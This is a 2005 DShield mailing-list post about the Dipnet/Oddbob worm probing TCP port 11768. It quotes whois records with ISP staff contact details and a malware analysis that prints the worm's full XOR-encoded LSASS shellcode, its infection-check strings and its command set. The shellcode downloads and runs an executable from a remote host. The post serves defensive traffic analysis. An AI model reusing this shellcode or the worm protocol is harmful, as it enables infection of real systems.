[Dshield] port 11768

jayjwa jayjwa at atr2.ath.cx
Fri Jan 14 04:47:56 GMT 2005


On Wed, 12 Jan 2005, Esler, Joel - Contractor wrote:

+ Date: Wed, 12 Jan 2005 09:03:23 -0500
+ From: "Esler, Joel - Contractor" <joel.esler at rcert-s.army.mil>
+ Reply-To: General DShield Discussion List <list at lists.dshield.org>
+ To: General DShield Discussion List <list at lists.dshield.org>
+ Subject: RE: [Dshield] port 11768
+ 
+ I've been on that port for a week now.  I am experiancing the same dump.
+ I have it through tcpdump and netcat, I am not sure really what to make
+ of it.



It's a LSASS-based virus. It connects to 11768 and supposedly another port 
to see if the infected machine is running the newest virus version. The 
site that is serving is in Russia:




% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

inetnum:      82.179.192.0 - 82.179.199.255
netname:      PLUSINFO
descr:        PLUSINFO ISP company
descr:        Podkopaevsky per., 7, str.1
descr:        Moscow, Russia
country:      RU
admin-c:      MU-RIPE
tech-c:       SVK53-RIPE
status:       ASSIGNED PA
notify:       noc at plus.ru
notify:       noc at runnet.ru
mnt-by:       RUNNET-MNT
changed:      als at run.net 20040317
source:       RIPE

route:        82.179.192.0/19
descr:        PlusInfo Moscow
origin:       AS28870
notify:       noc at plus.ru
mnt-by:       RUNNET-MNT
mnt-routes:   PLUSINFO-MNT
changed:      als at run.net 20040409
source:       RIPE

person:       Mikhail A. Ushakov
address:      Strojenie 1, 7, Podkopaevsky per.,
address:      109028, Moscow
address:      Russia
e-mail:       m at plus.ru
phone:        +7 095 9173399
fax-no:       +7 095 9238659
notify:       m at plus.ru
nic-hdl:      MU-RIPE
mnt-by:       RUNNET-MNT
changed:      m at plus.ru 20011227
source:       RIPE

person:       Sergey V Kurlovich
address:      Podkopaevsky per., 7, str.1,
address:      Moscow, Russia
e-mail:       sergey at plus.ru
phone:        +7 095 9173044
fax-no:       +7 095 9238659
notify:       sergey at plus.ru
nic-hdl:      SVK53-RIPE
changed:      sergey at plus.ru 20010710
source:       RIPE




I found this write-up:




Release Date 
January 13, 2005

Dipnet (or Oddbob) is a worm that spreads using the well-known
MS04-011 vulnerability that Sasser was based on. Its purpose is to
spread an IRC DDoS bot. Later variants of Dipnet are causing some
interest due to unusual traffic patterns onTCP port 11768 (and later
on TCP port 15118).

Analysis Before Dipnet exploits a host, it first attempts to connect
to that host on a chosen TCP port (11768 or 15118) and sends the
string "__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123". If the host is
already infected by Dipnet, it will respond with a specific response
encoded in the body of the worm. The latest variant we've seen
responds with "__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3", then
closes the connection. This exchange allows the worm to avoid
infecting hosts that are already running the latest version of the
worm software.

If the worm ascertains that the host is not already infected, or is
not runningthe latest version, it will then attempt to exploit the
LSASS vulnerability on TCP port 445. The shellcode of the exploit is
self-decrypting, with the bulk of the code XORed by 0xFF in order to
obfuscate the payload strings and prevent null bytes from prematurely
terminating the payload while being copied in memory by the affected
host. When decrypted, the shellcode continues running and downloads
the worm executable from a remote webserver and runs it.

The shellcode as received is as follows:

00000000  eb 00 06 00 eb 00 06 00  9b 00 2a 00 f9 00 77 00  |ë...ë.....*.ù.w.|
00000010  90 00 90 00 90 00 90 00  90 00 90 00 90 00 90 00  |................|
00000020  90 00 33 00 c0 00 f7 00  d0 00 8b 00 fb 00 f2 00  |..3.À.÷.Ð...û.ò.|
00000030  af 00 57 00 33 00 c9 00  b1 00 b2 00 90 00 90 00  |¯.W.3.É.±.².....|
00000040  90 00 90 00 80 00 37 00  ff 00 47 00 e2 00 fa 00  |......7.ÿ.G.â.ú.|
00000050  8b 00 ef 00 4d 00 5f 00  57 00 b8 00 30 00 fa 00  |..ï.M._.W.¸.0.ú.|
00000060  b0 00 83 00 f7 00 d0 00  ff 00 d0 00 8b 00 d8 00  |°...÷.Ð.ÿ.Ð...Ø.|
00000070  be 00 f8 00 ff 00 ff 00  ff 00 f7 00 d6 00 33 00  |¾.ø.ÿ.ÿ.ÿ.÷.Ö.3.|
00000080  c0 00 8b 00 c8 00 f7 00  d1 00 f2 00 ae 00 57 00  |À...È.÷.Ñ.ò.®.W.|
00000090  53 00 b8 00 56 00 19 00  b1 00 83 00 f7 00 d0 00  |S.¸.V...±...÷.Ð.|
000000a0  ff 00 d0 00 3e 00 89 00  44 00 b5 00 fd 00 4e 00  |ÿ.Ð.>...D.µ.ý.N.|
000000b0  0b 00 f6 00 75 00 e3 00  33 00 c0 00 8b 00 c8 00  |..ö.u.ã.3.À...È.|
000000c0  f7 00 d1 00 f2 00 ae 00  57 00 b8 00 30 00 fa 00  |÷.Ñ.ò.®.W.¸.0.ú.|
000000d0  b0 00 83 00 f7 00 d0 00  ff 00 d0 00 8b 00 d8 00  |°...÷.Ð.ÿ.Ð...Ø.|
000000e0  be 00 f5 00 ff 00 ff 00  ff 00 f7 00 d6 00 ba 00  |¾.õ.ÿ.ÿ.ÿ.÷.Ö.º.|
000000f0  f8 00 ff 00 ff 00 ff 00  f7 00 d2 00 52 00 33 00  |ø.ÿ.ÿ.ÿ.÷.Ò.R.3.|
00000100  c0 00 8b 00 c8 00 f7 00  d1 00 f2 00 ae 00 57 00  |À...È.÷.Ñ.ò.®.W.|
00000110  53 00 b8 00 56 00 19 00  b1 00 83 00 f7 00 d0 00  |S.¸.V...±...÷.Ð.|
00000120  ff 00 d0 00 3e 00 89 00  44 00 b5 00 fd 00 5a 00  |ÿ.Ð.>...D.µ.ý.Z.|
00000130  52 00 4e 00 3b 00 f2 00  75 00 e1 00 33 00 c0 00  |R.N.;.ò.u.á.3.À.|
00000140  8b 00 c8 00 f7 00 d1 00  f2 00 ae 00 90 00 90 00  |..È.÷.Ñ.ò.®.....|
00000150  33 00 c0 00 66 00 48 00  d1 00 e0 00 33 00 d2 00  |3.À.f.H.Ñ.à.3.Ò.|
00000160  50 00 52 00 ff 00 55 00  01 00 8b 00 f0 00 33 00  |P.R.ÿ.U.....ð.3.|
00000170  d2 00 52 00 52 00 52 00  52 00 57 00 ff 00 55 00  |Ò.R.R.R.R.W.ÿ.U.|
00000180  25 00 33 00 d2 00 52 00  52 00 52 00 52 00 8b 00  |%.3.Ò.R.R.R.R...|
00000190  d7 00 90 00 90 00 90 00  52 00 50 00 ff 00 55 00  |×.......R.P.ÿ.U.|
000001a0  21 00 57 00 33 00 d2 00  66 00 4a 00 d1 00 e2 00  |!.W.3.Ò.f.J.Ñ.â.|
000001b0  52 00 56 00 50 00 ff 00  55 00 1d 00 90 00 90 00  |R.V.P.ÿ.U.......|
000001c0  90 00 33 00 d2 00 52 00  b8 00 f4 00 ff 00 ff 00  |..3.Ò.R.¸.ô.ÿ.ÿ.|
000001d0  ff 00 f7 00 d0 00 8b 00  d5 00 2b 00 d0 00 42 00  |ÿ.÷.Ð...Õ.+.Ð.B.|
000001e0  90 00 90 00 52 00 ff 00  55 00 19 00 ff 00 37 00  |....R.ÿ.U...ÿ.7.|
000001f0  56 00 50 00 8b 00 d8 00  ff 00 55 00 15 00 53 00  |V.P...Ø.ÿ.U...S.|
00000200  ff 00 55 00 11 00 90 00  90 00 90 00 90 00 90 00  |ÿ.U.............|
00000210  33 00 d2 00 42 00 52 00  b8 00 f4 00 ff 00 ff 00  |3.Ò.B.R.¸.ô.ÿ.ÿ.|
00000220  ff 00 f7 00 d0 00 8b 00  d5 00 2b 00 d0 00 42 00  |ÿ.÷.Ð...Õ.+.Ð.B.|
00000230  90 00 90 00 90 00 52 00  ff 00 55 00 09 00 90 00  |......R.ÿ.U.....|
00000240  33 00 d2 00 f7 00 d2 00  c1 00 e2 00 04 00 52 00  |3.Ò.÷.Ò.Á.â...R.|
00000250  ff 00 55 00 05 00 eb 00  f3 00 90 00 87 00 db 00  |ÿ.U...ë.ó.....Û.|
00000260  ff 00 ff 00 ff 00 ff 00  b4 00 ba 00 ad 00 b1 00  |ÿ.ÿ.ÿ.ÿ.´.º.­.±.|
00000270  ba 00 b3 00 cc 00 cd 00  d1 00 bb 00 b3 00 b3 00  |º.³.Ì.Í.Ñ.».³.³.|
00000280  ff 00 a0 00 93 00 9c 00  8d 00 9a 00 9e 00 8b 00  |ÿ. .............|
00000290  ff 00 a0 00 93 00 88 00  8d 00 96 00 8b 00 9a 00  |ÿ. .............|
000002a0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00  |ÿ. .............|
000002b0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00  |ÿ. .............|
000002c0  ff 00 a8 00 96 00 91 00  ba 00 87 00 9a 00 9c 00  |ÿ.¨.....º.......|
000002d0  ff 00 ac 00 93 00 9a 00  9a 00 8f 00 ff 00 b8 00  |ÿ.¬.........ÿ.¸.|
000002e0  93 00 90 00 9d 00 9e 00  93 00 be 00 93 00 93 00  |..........¾.....|
000002f0  90 00 9c 00 ff 00 a8 00  b6 00 b1 00 b6 00 b1 00  |....ÿ.¨.¶.±.¶.±.|
00000300  ba 00 ab 00 d1 00 bb 00  b3 00 b3 00 ff 00 b6 00  |º.«.Ñ.».³.³.ÿ.¶.|
00000310  91 00 8b 00 9a 00 8d 00  91 00 9a 00 8b 00 b0 00  |..............°.|
00000320  8f 00 9a 00 91 00 be 00  ff 00 b6 00 91 00 8b 00  |......¾.ÿ.¶.....|
00000330  9a 00 8d 00 91 00 9a 00  8b 00 b0 00 8f 00 9a 00  |..........°.....|
00000340  91 00 aa 00 8d 00 93 00  be 00 ff 00 b6 00 91 00  |..ª.....¾.ÿ.¶...|
00000350  8b 00 9a 00 8d 00 91 00  9a 00 8b 00 ad 00 9a 00  |............­...|
00000360  9e 00 9b 00 b9 00 96 00  93 00 9a 00 ff 00 97 00  |....¹.......ÿ...|
00000370  8b 00 8b 00 8f 00 c5 00  d0 00 d0 00 9e 00 8b 00  |......Å.Ð.Ð.....|
00000380  93 00 9e 00 91 00 8b 00  9c 00 90 00 92 00 92 00  |................|
00000390  9a 00 8d 00 9c 00 9a 00  d1 00 9c 00 90 00 92 00  |........Ñ.......|
000003a0  d0 00 8c 00 8b 00 8a 00  99 00 99 00 d1 00 9a 00  |Ð...........Ñ...|
000003b0  87 00 9a 00 ff 00 88 00  96 00 91 00 9c 00 9a 00  |....ÿ...........|
000003c0  8d 00 d1 00 9a 00 87 00  9a 00 ff 00 88 00 88 00  |..Ñ.......ÿ.....|
000003d0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
000003e0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
000003f0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
00000400  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
00000410  88 00 88 00 88 00 88 00  88 00 88 00 ff 00        |............ÿ.|

The shellcode uses InternetOpenA and WinExec Windows API calls to
download and execute a file from a URL. This particular shellcode
downloads the file from:

http://atl<blocked>rce.com/stuff.exe

The worm executable sets up its own listener on the specified port in
order to communicate with future instances of the worm that may
attempt to exploit the host. It also communicates with two different
websites in order to receive additional commands. Commands can be one
of the following:

DIE: delete worm registry keys and exit DOWNLOAD: download a file via
HTTP EXEC: execute a file RESET: restart the scanner with a new batch
of IP address masks APPEND: insert additional IP address masks to scan

The first website provides the worm with a list of IP address ranges
to scan and exploit. The second website provides the worm with other
malware to download and execute. Finally, the worm begins to scan and
exploit additional hosts based on the IP address masks given.

At the time of this writing, two additional executables were being
served up by the control websites. One is an IRC DDoS bot identified
as Backdoor.Win32.IRCBot.k, the other is a backdoor with a
kernel-level driver that hides the process, known as
Backdoor.Win32.Masteseq.

The DDoS bot connects to a channel on a private IRC server in
Russia. At the time of this writing the channel had accumulated
between 2800 and 2900 infected hosts.







Even though they sensored the URL, they gave the full shellcode AND the 
value it's XOR'ed by ;)


It's there, "stuff.exe". Looking at it now...




--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++


More information about the list mailing list